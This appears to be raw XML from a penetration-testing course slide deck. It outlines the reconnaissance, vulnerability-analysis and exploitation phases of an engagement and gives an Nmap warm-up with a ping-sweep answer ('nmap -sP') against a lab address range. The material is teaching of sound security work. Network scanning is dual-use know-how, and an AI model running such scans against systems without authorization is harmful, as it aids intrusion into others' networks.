        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Google Shape;2061;p106"/>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Where Are We?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2062" name="Google Shape;2062;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="94107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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Today, we will focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>middle three phases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of an engagement.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2063" name="Google Shape;2063;p10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4</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2064" name="Google Shape;2064;p106"/>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Google Slides Template</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2065" name="Google Shape;2065;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1937825"/>
            <a:ext cx="2501700" cy="2662800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Intelligence Gathering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Reconnaissance is the most important step of an engagement.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>This includes port scanning, banner grabbing, and enumeration.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="Google Shape;2066;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1937837"/>
            <a:ext cx="2371500" cy="2662800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Vulnerability Analysis</a:t>
            </a:r>
            <a:endParaRPr b="1"/>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
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Study the results of your information gathering to identify potential attack vectors.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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
        <p:nvSpPr>
          <p:cNvPr id="2067" name="Google Shape;2067;p106"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1938587"/>
            <a:ext cx="2371500" cy="2662800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Drill down on one of the vulnerabilities you identified to actually exploit the target.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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071"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Google Shape;2072;p107"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-101100" y="4234600"/>
            <a:ext cx="8970300" cy="634500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="9125" rIns="1005825" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>15 Minutes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2073" name="Google Shape;2073;p10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5</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2074" name="Google Shape;2074;p107"/>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075" name="Google Shape;2075;p107"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="0" rIns="457200" bIns="457200" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>Warm-Up Activity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Review</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity, you will review Nmap using the Scanning and Enumeration lab environment. </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>Instructions sent via Slack. </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"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079"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2080" name="Google Shape;2080;p108"/>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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2081" name="Google Shape;2081;p108"/>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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082" name="Google Shape;2082;p10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6</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2083" name="Google Shape;2083;p108"/>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084" name="Google Shape;2084;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1378748"/>
            <a:ext cx="9144000" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2085" name="Google Shape;2085;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2086" name="Google Shape;2086;p108"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263" y="2854300"/>
            <a:ext cx="9144000" cy="1005000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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090"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Google Shape;2091;p109"/>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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2092" name="Google Shape;2092;p109"/>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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2093" name="Google Shape;2093;p10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7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2094" name="Google Shape;2094;p109"/>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095" name="Google Shape;2095;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1452937"/>
            <a:ext cx="9144000" cy="764700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> 10.0.0.0-254. </a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>This reveals the hosts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.10, 10.0.0.100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>10.0.0.101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2096" name="Google Shape;2096;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287" y="2353513"/>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Write an Nmap command to perform a service/version scan of the live hosts you discover. Save the results as an XML file to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/tmp/results.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.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100"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2101" name="Google Shape;2101;p11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Nmap Warm Up Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2102" name="Google Shape;2102;p110"/>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Write an Nmap command to perform a ping sweep of the range 10.0.0.0 to 10.0.0.254.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2103" name="Google Shape;2103;p11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8</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2104" name="Google Shape;2104;p110"/>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105" name="Google Shape;2105;p110"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275" y="1452937"/>
            <a:ext cx="9144000" cy="764700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
